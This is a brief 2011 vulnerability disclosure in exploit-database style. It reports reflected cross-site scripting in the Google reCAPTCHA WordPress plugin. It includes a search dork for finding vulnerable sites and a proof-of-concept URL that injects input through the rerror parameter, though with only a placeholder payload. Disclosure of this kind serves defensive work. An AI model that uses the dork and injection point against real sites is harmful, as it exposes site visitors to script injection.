############################################################################################################ 

#  Exploit Title: Google reCAPTCHA Wordpress Plugin  - Reflected Cross-Site Scripting ( XSS ) Vulnerability 

#  Script Page : http://www.google.com/recaptcha  
                 http://wordpress.org/extend/plugins/wp-recaptcha
   
#  Date: 11-12-2011

#  Author : RandomStorm  - http://www.randomstorm.com

#  Avram Marius Gabriel (d3v1l)

#  Tested on: Windows XP & Vista (IE9 - Firefox 8.0) 
 
#  Dork: inurl:rcommentid= error= 
 

########################################################################################################### 
 
#  Cross-Site Scripting (XSS) 

#  XSS POC:  

#  http://localhost/comment-page-1/?rcommentid=57716&rerror=XSS

########################################################################################################### 
 
# About: The reCAPTCHA WordPress plugin uses a CAPTCHA to prevent comment spam and also uses MailHide to  
  prevent email spam

###########################################################################################################